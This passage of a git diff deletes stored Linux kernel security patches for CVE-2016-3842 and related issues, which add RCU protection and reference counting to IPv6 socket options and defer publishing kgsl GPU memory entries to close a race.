- if (IS_ERR(dst)) {
-diff --git a/net/ipv6/datagram.c b/net/ipv6/datagram.c
-index d70b023..517c55b 100644
----- a/net/ipv6/datagram.c
-+++ b/net/ipv6/datagram.c
-@@ -167,8 +167,10 @@ ipv4_connected:
-
- security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
-
-- opt = flowlabel ? flowlabel->opt : np->opt;
-+ rcu_read_lock();
-+ opt = flowlabel ? flowlabel->opt : rcu_dereference(np->opt);
- final_p = fl6_update_dst(&fl6, opt, &final);
-+ rcu_read_unlock();
-
- dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
- err = 0;
-diff --git a/net/ipv6/exthdrs.c b/net/ipv6/exthdrs.c
-index ce203b0..ea7c4d6 100644
----- a/net/ipv6/exthdrs.c
-+++ b/net/ipv6/exthdrs.c
-@@ -727,6 +727,7 @@ ipv6_dup_options(struct sock *sk, struct ipv6_txoptions *opt)
- *((char **)&opt2->dst1opt) += dif;
- if (opt2->srcrt)
- *((char **)&opt2->srcrt) += dif;
-+ atomic_set(&opt2->refcnt, 1);
- }
- return opt2;
- }
-@@ -790,7 +791,7 @@ ipv6_renew_options(struct sock *sk, struct ipv6_txoptions *opt,
- return ERR_PTR(-ENOBUFS);
-
- memset(opt2, 0, tot_len);
--
-+ atomic_set(&opt2->refcnt, 1);
- opt2->tot_len = tot_len;
- p = (char *)(opt2 + 1);
-
-diff --git a/net/ipv6/inet6_connection_sock.c b/net/ipv6/inet6_connection_sock.c
-index 5d1c7ce..3ff5208 100644
----- a/net/ipv6/inet6_connection_sock.c
-+++ b/net/ipv6/inet6_connection_sock.c
-@@ -78,7 +78,9 @@ struct dst_entry *inet6_csk_route_req(const struct sock *sk,
- memset(fl6, 0, sizeof(*fl6));
- fl6->flowi6_proto = proto;
- fl6->daddr = ireq->ir_v6_rmt_addr;
-- final_p = fl6_update_dst(fl6, np->opt, &final);
-+ rcu_read_lock();
-+ final_p = fl6_update_dst(fl6, rcu_dereference(np->opt), &final);
-+ rcu_read_unlock();
- fl6->saddr = ireq->ir_v6_loc_addr;
- fl6->flowi6_oif = ireq->ir_iif;
- fl6->flowi6_mark = ireq->ir_mark;
-@@ -142,7 +144,9 @@ static struct dst_entry *inet6_csk_route_socket(struct sock *sk,
- fl6->fl6_dport = inet->inet_dport;
- security_sk_classify_flow(sk, flowi6_to_flowi(fl6));
-
-- final_p = fl6_update_dst(fl6, np->opt, &final);
-+ rcu_read_lock();
-+ final_p = fl6_update_dst(fl6, rcu_dereference(np->opt), &final);
-+ rcu_read_unlock();
-
- dst = __inet6_csk_dst_check(sk, np->dst_cookie);
- if (!dst) {
-@@ -175,7 +179,8 @@ int inet6_csk_xmit(struct sock *sk, struct sk_buff *skb, struct flowi *fl_unused
- /* Restore final destination back after routing done */
- fl6.daddr = sk->sk_v6_daddr;
-
-- res = ip6_xmit(sk, skb, &fl6, np->opt, np->tclass);
-+ res = ip6_xmit(sk, skb, &fl6, rcu_dereference(np->opt),
-+ np->tclass);
- rcu_read_unlock();
- return res;
- }
-diff --git a/net/ipv6/ipv6_sockglue.c b/net/ipv6/ipv6_sockglue.c
-index 63e6956..4449ad1 100644
----- a/net/ipv6/ipv6_sockglue.c
-+++ b/net/ipv6/ipv6_sockglue.c
-@@ -111,7 +111,8 @@ struct ipv6_txoptions *ipv6_update_options(struct sock *sk,
- icsk->icsk_sync_mss(sk, icsk->icsk_pmtu_cookie);
- }
- }
-- opt = xchg(&inet6_sk(sk)->opt, opt);
-+ opt = xchg((__force struct ipv6_txoptions **)&inet6_sk(sk)->opt,
-+ opt);
- sk_dst_reset(sk);
-
- return opt;
-@@ -231,9 +232,12 @@ static int do_ipv6_setsockopt(struct sock *sk, int level, int optname,
- sk->sk_socket->ops = &inet_dgram_ops;
- sk->sk_family = PF_INET;
- }
-- opt = xchg(&np->opt, NULL);
-- if (opt)
-- sock_kfree_s(sk, opt, opt->tot_len);
-+ opt = xchg((__force struct ipv6_txoptions **)&np->opt,
-+ NULL);
-+ if (opt) {
-+ atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+ txopt_put(opt);
-+ }
- pktopt = xchg(&np->pktoptions, NULL);
- kfree_skb(pktopt);
-
-@@ -403,7 +407,8 @@ static int do_ipv6_setsockopt(struct sock *sk, int level, int optname,
- if (optname != IPV6_RTHDR && !ns_capable(net->user_ns, CAP_NET_RAW))
- break;
-
-- opt = ipv6_renew_options(sk, np->opt, optname,
-+ opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+ opt = ipv6_renew_options(sk, opt, optname,
- (struct ipv6_opt_hdr __user *)optval,
- optlen);
- if (IS_ERR(opt)) {
-@@ -432,8 +437,10 @@ static int do_ipv6_setsockopt(struct sock *sk, int level, int optname,
- retv = 0;
- opt = ipv6_update_options(sk, opt);
- sticky_done:
-- if (opt)
-- sock_kfree_s(sk, opt, opt->tot_len);
-+ if (opt) {
-+ atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+ txopt_put(opt);
-+ }
- break;
- }
-
-@@ -486,6 +493,7 @@ sticky_done:
- break;
-
- memset(opt, 0, sizeof(*opt));
-+ atomic_set(&opt->refcnt, 1);
- opt->tot_len = sizeof(*opt) + optlen;
- retv = -EFAULT;
- if (copy_from_user(opt+1, optval, optlen))
-@@ -502,8 +510,10 @@ update:
- retv = 0;
- opt = ipv6_update_options(sk, opt);
- done:
-- if (opt)
-- sock_kfree_s(sk, opt, opt->tot_len);
-+ if (opt) {
-+ atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+ txopt_put(opt);
-+ }
- break;
- }
- case IPV6_UNICAST_HOPS:
-@@ -1110,10 +1120,11 @@ static int do_ipv6_getsockopt(struct sock *sk, int level, int optname,
- case IPV6_RTHDR:
- case IPV6_DSTOPTS:
- {
-+ struct ipv6_txoptions *opt;
-
- lock_sock(sk);
-- len = ipv6_getsockopt_sticky(sk, np->opt,
-- optname, optval, len);
-+ opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+ len = ipv6_getsockopt_sticky(sk, opt, optname, optval, len);
- release_sock(sk);
- /* check if ipv6_getsockopt_sticky() returns err code */
- if (len < 0)
-diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
-index dc65ec1..9914098 100644
----- a/net/ipv6/raw.c
-+++ b/net/ipv6/raw.c
-@@ -733,6 +733,7 @@ static int raw6_getfrag(void *from, char *to, int offset, int len, int odd,
-
- static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- {
-+ struct ipv6_txoptions *opt_to_free = NULL;
- struct ipv6_txoptions opt_space;
- DECLARE_SOCKADDR(struct sockaddr_in6 *, sin6, msg->msg_name);
- struct in6_addr *daddr, *final_p, final;
-@@ -839,8 +840,10 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- if (!(opt->opt_nflen|opt->opt_flen))
- opt = NULL;
- }
-- if (!opt)
-- opt = np->opt;
-+ if (!opt) {
-+ opt = txopt_get(np);
-+ opt_to_free = opt;
-+ }
- if (flowlabel)
- opt = fl6_merge_options(&opt_space, flowlabel, opt);
- opt = ipv6_fixup_options(&opt_space, opt);
-@@ -906,6 +909,7 @@ done:
- dst_release(dst);
- out:
- fl6_sock_release(flowlabel);
-+ txopt_put(opt_to_free);
- return err < 0 ? err : len;
- do_confirm:
- dst_confirm(dst);
-diff --git a/net/ipv6/syncookies.c b/net/ipv6/syncookies.c
-index bb8f2fa..eaf7ac4 100644
----- a/net/ipv6/syncookies.c
-+++ b/net/ipv6/syncookies.c
-@@ -222,7 +222,7 @@ struct sock *cookie_v6_check(struct sock *sk, struct sk_buff *skb)
- memset(&fl6, 0, sizeof(fl6));
- fl6.flowi6_proto = IPPROTO_TCP;
- fl6.daddr = ireq->ir_v6_rmt_addr;
-- final_p = fl6_update_dst(&fl6, np->opt, &final);
-+ final_p = fl6_update_dst(&fl6, rcu_dereference(np->opt), &final);
- fl6.saddr = ireq->ir_v6_loc_addr;
- fl6.flowi6_oif = sk->sk_bound_dev_if;
- fl6.flowi6_mark = ireq->ir_mark;
-diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
-index c5429a6..6a50bb4 100644
----- a/net/ipv6/tcp_ipv6.c
-+++ b/net/ipv6/tcp_ipv6.c
-@@ -120,6 +120,7 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- struct ipv6_pinfo *np = inet6_sk(sk);
- struct tcp_sock *tp = tcp_sk(sk);
- struct in6_addr *saddr = NULL, *final_p, final;
-+ struct ipv6_txoptions *opt;
- struct flowi6 fl6;
- struct dst_entry *dst;
- int addr_type;
-@@ -235,7 +236,8 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- fl6.fl6_dport = usin->sin6_port;
- fl6.fl6_sport = inet->inet_sport;
-
-- final_p = fl6_update_dst(&fl6, np->opt, &final);
-+ opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+ final_p = fl6_update_dst(&fl6, opt, &final);
-
- security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
-
-@@ -263,9 +265,9 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- tcp_fetch_timewait_stamp(sk, dst);
-
- icsk->icsk_ext_hdr_len = 0;
-- if (np->opt)
-- icsk->icsk_ext_hdr_len = (np->opt->opt_flen +
-- np->opt->opt_nflen);
-+ if (opt)
-+ icsk->icsk_ext_hdr_len = opt->opt_flen +
-+ opt->opt_nflen;
-
- tp->rx_opt.mss_clamp = IPV6_MIN_MTU - sizeof(struct tcphdr) - sizeof(struct ipv6hdr);
-
-@@ -461,7 +463,8 @@ static int tcp_v6_send_synack(const struct sock *sk, struct dst_entry *dst,
- if (np->repflow && ireq->pktopts)
- fl6->flowlabel = ip6_flowlabel(ipv6_hdr(ireq->pktopts));
-
-- err = ip6_xmit(sk, skb, fl6, np->opt, np->tclass);
-+ err = ip6_xmit(sk, skb, fl6, rcu_dereference(np->opt),
-+ np->tclass);
- err = net_xmit_eval(err);
- }
-
-@@ -972,6 +975,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- struct inet_request_sock *ireq;
- struct ipv6_pinfo *newnp;
- const struct ipv6_pinfo *np = inet6_sk(sk);
-+ struct ipv6_txoptions *opt;
- struct tcp6_sock *newtcp6sk;
- struct inet_sock *newinet;
- struct tcp_sock *newtp;
-@@ -1098,13 +1102,15 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- but we make one more one thing there: reattach optmem
- to newsk.
- */
-- if (np->opt)
-- newnp->opt = ipv6_dup_options(newsk, np->opt);
--
-+ opt = rcu_dereference(np->opt);
-+ if (opt) {
-+ opt = ipv6_dup_options(newsk, opt);
-+ RCU_INIT_POINTER(newnp->opt, opt);
-+ }
- inet_csk(newsk)->icsk_ext_hdr_len = 0;
-- if (newnp->opt)
-- inet_csk(newsk)->icsk_ext_hdr_len = (newnp->opt->opt_nflen +
-- newnp->opt->opt_flen);
-+ if (opt)
-+ inet_csk(newsk)->icsk_ext_hdr_len = opt->opt_nflen +
-+ opt->opt_flen;
-
- tcp_ca_openreq_child(newsk, dst);
-
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 01bcb49..9da3287 100644
----- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -1110,6 +1110,7 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- DECLARE_SOCKADDR(struct sockaddr_in6 *, sin6, msg->msg_name);
- struct in6_addr *daddr, *final_p, final;
- struct ipv6_txoptions *opt = NULL;
-+ struct ipv6_txoptions *opt_to_free = NULL;
- struct ip6_flowlabel *flowlabel = NULL;
- struct flowi6 fl6;
- struct dst_entry *dst;
-@@ -1263,8 +1264,10 @@ do_udp_sendmsg:
- opt = NULL;
- connected = 0;
- }
-- if (!opt)
-- opt = np->opt;
-+ if (!opt) {
-+ opt = txopt_get(np);
-+ opt_to_free = opt;
-+ }
- if (flowlabel)
- opt = fl6_merge_options(&opt_space, flowlabel, opt);
- opt = ipv6_fixup_options(&opt_space, opt);
-@@ -1373,6 +1376,7 @@ release_dst:
- out:
- dst_release(dst);
- fl6_sock_release(flowlabel);
-+ txopt_put(opt_to_free);
- if (!err)
- return len;
- /*
-diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
-index aca38d8..a2c8747 100644
----- a/net/l2tp/l2tp_ip6.c
-+++ b/net/l2tp/l2tp_ip6.c
-@@ -486,6 +486,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- DECLARE_SOCKADDR(struct sockaddr_l2tpip6 *, lsa, msg->msg_name);
- struct in6_addr *daddr, *final_p, final;
- struct ipv6_pinfo *np = inet6_sk(sk);
-+ struct ipv6_txoptions *opt_to_free = NULL;
- struct ipv6_txoptions *opt = NULL;
- struct ip6_flowlabel *flowlabel = NULL;
- struct dst_entry *dst = NULL;
-@@ -575,8 +576,10 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- opt = NULL;
- }
-
-- if (opt == NULL)
-- opt = np->opt;
-+ if (!opt) {
-+ opt = txopt_get(np);
-+ opt_to_free = opt;
-+ }
- if (flowlabel)
- opt = fl6_merge_options(&opt_space, flowlabel, opt);
- opt = ipv6_fixup_options(&opt_space, opt);
-@@ -631,6 +634,7 @@ done:
- dst_release(dst);
- out:
- fl6_sock_release(flowlabel);
-+ txopt_put(opt_to_free);
-
- return err < 0 ? err : len;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3842/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-3842/3.10/0002.patch
deleted file mode 100644
index 56181300..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3842/3.10/0002.patch
+++ /dev/null
@@ -1,163 +0,0 @@
-From f5f0a2fe84b589793baa5713ea2aa16779e00d5e Mon Sep 17 00:00:00 2001
-From: Sunil Khatri
-Date: Mon, 13 Jun 2016 15:42:24 -0700
-Subject: [PATCH] msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process idr and rb tree
-too early, other threads can do operations on the entry by
-guessing the ID or GPU address before the object gets returned
-by the creating operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-Bug: 28026365
-Bug: 28377352
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse
-Signed-off-by: Sunil Khatri
-Signed-off-by: Santhosh Punugu
----
- drivers/gpu/msm/kgsl.c | 60 ++++++++++++++++++++++++++++++++++++--------------
- 1 file changed, 43 insertions(+), 17 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index a1394b6d3d824..f62fe8ad0b857 100644
----- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -296,18 +296,13 @@ kgsl_mem_entry_destroy(struct kref *kref)
- EXPORT_SYMBOL(kgsl_mem_entry_destroy);
-
- /**
-- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and
-- * assign it with a gpu address space before insertion
-+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before
-+ * insertion to the process
- * @process: the process that owns the memory
- * @entry: the memory entry
- *
-- * @returns - 0 on succcess else error code
-+ * @returns - 0 on success else error code
- *
-- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address.
-- * The assignment of gpu address and insertion into list needs to
-- * happen with the memory lock held to avoid race conditions between
-- * gpu address being selected and some other thread looking through the
-- * rb list in search of memory based on gpuaddr
- * This function should be called with processes memory spinlock held
- */
- static int
-@@ -315,8 +310,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- struct kgsl_mem_entry *entry)
- {
- int ret = 0;
-- struct rb_node **node;
-- struct rb_node *parent = NULL;
- struct kgsl_pagetable *pagetable = process->pagetable;
-
- assert_spin_locked(&process->mem_lock);
-@@ -337,11 +330,22 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- pagetable = pagetable->mmu->securepagetable;
-
- ret = kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc);
-- if (ret)
-- goto done;
-
-- node = &process->mem_rb.rb_node;
-+done:
-+ return ret;
-+}
-
-+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process,
-+ struct kgsl_mem_entry *entry)
-+{
-+ struct rb_node **node;
-+ struct rb_node *parent = NULL;
-+
-+ if (!entry->memdesc.gpuaddr)
-+ return;
-+
-+ /* Insert mem entry in mem_rb tree */
-+ node = &process->mem_rb.rb_node;
- while (*node) {
- struct kgsl_mem_entry *cur;
-
-@@ -356,9 +360,20 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
-
- rb_link_node(&entry->node, parent, node);
- rb_insert_color(&entry->node, &process->mem_rb);
-+}
-
--done:
-- return ret;
-+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process,
-+ struct kgsl_mem_entry *entry)
-+{
-+ if (!entry)
-+ return;
-+
-+ spin_lock(&entry->priv->mem_lock);
-+ /* Insert mem entry in mem_rb tree */
-+ kgsl_mem_entry_commit_mem_list(process, entry);
-+ /* Replace mem entry in mem_idr using id */
-+ idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+ spin_unlock(&entry->priv->mem_lock);
- }
-
- /**
-@@ -407,7 +422,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- return -EBADF;
- idr_preload(GFP_KERNEL);
- spin_lock(&process->mem_lock);
-- id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+ /* Allocate the ID but don't attach the pointer just yet */
-+ id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- spin_unlock(&process->mem_lock);
- idr_preload_end();
-
-@@ -3247,6 +3263,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
-
- trace_kgsl_mem_map(entry, param->fd);
-
-+ kgsl_mem_entry_commit_process(private, entry);
- return result;
-
- error_attach:
-@@ -3601,6 +3618,8 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- param->gpuaddr = entry->memdesc.gpuaddr;
- param->size = entry->memdesc.size;
- param->flags = entry->memdesc.flags;
-+
-+ kgsl_mem_entry_commit_process(private, entry);
- return result;
- err:
- kgsl_sharedmem_free(&entry->memdesc);
-@@ -3646,6 +3665,8 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- param->size = entry->memdesc.size;
- param->mmapsize = kgsl_memdesc_mmapsize(&entry->memdesc);
- param->gpuaddr = entry->memdesc.gpuaddr;
-+
-+ kgsl_mem_entry_commit_process(private, entry);
- return result;
- err:
- if (entry)
-@@ -4169,6 +4190,11 @@ static int kgsl_check_gpu_addr_collision(
- spin_lock(&private->mem_lock);
- kgsl_mem_entry_untrack_gpuaddr(private, entry);
- spin_unlock(&private->mem_lock);
-+ } else {
-+ /* Insert mem entry in mem_rb tree */
-+ spin_lock(&private->mem_lock);
-+ kgsl_mem_entry_commit_mem_list(private, entry);
-+ spin_unlock(&private->mem_lock);
- }
- } else {
- trace_kgsl_mem_unmapped_area_collision(entry, addr, len,
diff --git a/Patches/Linux_CVEs/CVE-2016-3842/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2016-3842/3.18/0003.patch
deleted file mode 100644
index b1ed3898..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3842/3.18/0003.patch
+++ /dev/null
@@ -1,77 +0,0 @@ -From 905de01dda0bc6663f8ce5c8f0f3831dae49bb36 Mon Sep 17 00:00:00 2001 -From: Jordan Crouse -Date: Tue, 3 May 2016 14:11:03 -0600 -Subject: [PATCH] msm: kgsl: Defer adding the mem entry to a process - -If we add the mem entry pointer in the process mem_idr too early -other threads can do operations on the entry by guessing the ID -or GPU address before the object gets returned by the creating -operation. - -Allocate an ID for the object but don't assign the pointer until -right before the creating function returns ensuring that another -operation can't access it until it is ready. - -CRs-Fixed: 1002974 -Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8 -Signed-off-by: Jordan Crouse ---- - drivers/gpu/msm/kgsl.c | 17 ++++++++++++++++- - 1 file changed, 16 insertions(+), 1 deletion(-) - -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index 51dc781b2bd47..2563591f376e2 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -388,6 +388,17 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process, - kgsl_mmu_put_gpuaddr(pagetable, &entry->memdesc); - } - -+/* Commit the entry to the process so it can be accessed by other operations */ -+static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry) -+{ -+ if (!entry) -+ return; -+ -+ spin_lock(&entry->priv->mem_lock); -+ idr_replace(&entry->priv->mem_idr, entry, entry->id); -+ spin_unlock(&entry->priv->mem_lock); -+} -+ - /** - * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process - * @entry: the memory entry -@@ -418,7 +429,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry, - - idr_preload(GFP_KERNEL); - spin_lock(&process->mem_lock); -- id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT); -+ /* Allocate the ID but don't attach the pointer just yet */ -+ id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT); - spin_unlock(&process->mem_lock); - idr_preload_end(); - -@@ -2317,6 +2329,7 @@ long 
kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv, - - trace_kgsl_mem_map(entry, fd); - -+ kgsl_mem_entry_commit_process(entry); - return 0; - - unmap: -@@ -2580,6 +2593,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv, - - trace_kgsl_mem_map(entry, param->fd); - -+ kgsl_mem_entry_commit_process(entry); - return result; - - error_attach: -@@ -2971,6 +2985,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry( - entry->memdesc.size); - trace_kgsl_mem_alloc(entry); - -+ kgsl_mem_entry_commit_process(entry); - return entry; - err: - kfree(entry); diff --git a/Patches/Linux_CVEs/CVE-2016-3842/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-3842/3.4/0001.patch deleted file mode 100644 index 53de44d3..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3842/3.4/0001.patch +++ /dev/null 
@@ -1,208 +0,0 @@ -From 15701ca335357e98a0eb98ef079fe45e3b830591 Mon Sep 17 00:00:00 2001 -From: Sunil Khatri -Date: Mon, 13 Jun 2016 15:45:19 -0700 -Subject: [PATCH] msm: kgsl: Defer adding the mem entry to a process - -If we add the mem entry pointer in the process idr and rb tree -too early, other threads can do operations on the entry by -guessing the ID or GPU address before the object gets returned -by the creating operation. - -Allocate an ID for the object but don't assign the pointer until -right before the creating function returns ensuring that another -operation can't access it until it is ready. - -Bug: 28026365 -CRs-Fixed: 1002974 -Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8 -Signed-off-by: Jordan Crouse -Signed-off-by: Sunil Khatri -Signed-off-by: Santhosh Punugu ---- - drivers/gpu/msm/kgsl.c | 103 +++++++++++++++++++++++++++++++------------------ - 1 file changed, 65 insertions(+), 38 deletions(-) - -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index a4986a75b6260..31a403a939242 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2008-2013, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2008-2013,2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -246,18 +246,13 @@ kgsl_mem_entry_destroy(struct kref *kref) - EXPORT_SYMBOL(kgsl_mem_entry_destroy); - - /** -- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and -- * assign it with a gpu address space before insertion -+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before -+ * insertion to the process - * @process: the process that owns the memory - * @entry: the memory entry - * -- * @returns - 0 on succcess else error code -+ * @returns - 0 on success else error code - * -- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address. -- * The assignment of gpu address and insertion into list needs to -- * happen with the memory lock held to avoid race conditions between -- * gpu address being selected and some other thread looking through the -- * rb list in search of memory based on gpuaddr - * This function should be called with processes memory spinlock held - */ - static int -@@ -265,8 +260,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process, - struct kgsl_mem_entry *entry) - { - int ret = 0; -- struct rb_node **node; -- struct rb_node *parent = NULL; - - assert_spin_locked(&process->mem_lock); - /* -@@ -274,36 +267,17 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process, - * gpu address - */ - if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) { -- if (!entry->memdesc.gpuaddr) -- goto done; -- } else if (entry->memdesc.gpuaddr) { -- WARN_ONCE(1, "gpuaddr assigned w/o holding memory lock\n"); -- ret = -EINVAL; -- goto done; -- } -- if (!kgsl_memdesc_use_cpu_map(&entry->memdesc)) { -- ret = kgsl_mmu_get_gpuaddr(process->pagetable, &entry->memdesc); -- if (ret) -+ /* cpu map flag is enabled. 
do nothing */ -+ } else { -+ if (entry->memdesc.gpuaddr) { -+ WARN_ONCE(1, "gpuaddr assigned w/o holding memory lock\n"); -+ ret = -EINVAL; - goto done; -- } -- -- node = &process->mem_rb.rb_node; -- -- while (*node) { -- struct kgsl_mem_entry *cur; -- -- parent = *node; -- cur = rb_entry(parent, struct kgsl_mem_entry, node); -+ } - -- if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr) -- node = &parent->rb_left; -- else -- node = &parent->rb_right; -+ ret = kgsl_mmu_get_gpuaddr(process->pagetable, &entry->memdesc); - } - -- rb_link_node(&entry->node, parent, node); -- rb_insert_color(&entry->node, &process->mem_rb); -- - done: - return ret; - } -@@ -327,6 +301,47 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process, - } - } - -+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process, -+ struct kgsl_mem_entry *entry) -+{ -+ struct rb_node **node; -+ struct rb_node *parent = NULL; -+ -+ if (!entry->memdesc.gpuaddr) -+ return; -+ -+ /* Insert mem entry in mem_rb tree */ -+ node = &process->mem_rb.rb_node; -+ while (*node) { -+ struct kgsl_mem_entry *cur; -+ -+ parent = *node; -+ cur = rb_entry(parent, struct kgsl_mem_entry, node); -+ -+ if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr) -+ node = &parent->rb_left; -+ else -+ node = &parent->rb_right; -+ } -+ -+ rb_link_node(&entry->node, parent, node); -+ rb_insert_color(&entry->node, &process->mem_rb); -+} -+ -+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process, -+ struct kgsl_mem_entry *entry) -+{ -+ if (!entry) -+ return; -+ -+ spin_lock(&entry->priv->mem_lock); -+ /* Insert mem entry in mem_rb tree */ -+ kgsl_mem_entry_commit_mem_list(process, entry); -+ /* Replace mem entry in mem_idr using id */ -+ idr_replace(&entry->priv->mem_idr, entry, entry->id); -+ spin_unlock(&entry->priv->mem_lock); -+} -+ - /** - * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process - * @entry: the memory entry -@@ -357,9 +372,11 @@ 
kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry, - } - - spin_lock(&process->mem_lock); -- ret = idr_get_new_above(&process->mem_idr, entry, 1, -+ /* Allocate the ID but don't attach the pointer just yet */ -+ ret = idr_get_new_above(&process->mem_idr, NULL, 1, - &entry->id); - spin_unlock(&process->mem_lock); -+ - if (ret == 0) - break; - else if (ret != -EAGAIN) -@@ -2894,6 +2911,7 @@ static long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv, - - trace_kgsl_mem_map(entry, param->fd); - -+ kgsl_mem_entry_commit_process(private, entry); - return result; - - error_attach: -@@ -3181,6 +3199,8 @@ kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv, - param->gpuaddr = entry->memdesc.gpuaddr; - param->size = entry->memdesc.size; - param->flags = entry->memdesc.flags; -+ -+ kgsl_mem_entry_commit_process(private, entry); - return result; - err: - kgsl_sharedmem_free(&entry->memdesc); -@@ -3217,6 +3237,8 @@ kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv, - param->size = entry->memdesc.size; - param->mmapsize = kgsl_memdesc_mmapsize(&entry->memdesc); - param->gpuaddr = entry->memdesc.gpuaddr; -+ -+ kgsl_mem_entry_commit_process(private, entry); - return result; - err: - if (entry) -@@ -3804,6 +3826,11 @@ kgsl_get_unmapped_area(struct file *file, unsigned long addr, - kgsl_mem_entry_untrack_gpuaddr(private, entry); - spin_unlock(&private->mem_lock); - ret = ret_val; -+ } else { -+ /* Insert mem entry in mem_rb tree */ -+ spin_lock(&private->mem_lock); -+ kgsl_mem_entry_commit_mem_list(private, entry); -+ spin_unlock(&private->mem_lock); - } - break; - } diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0001.patch 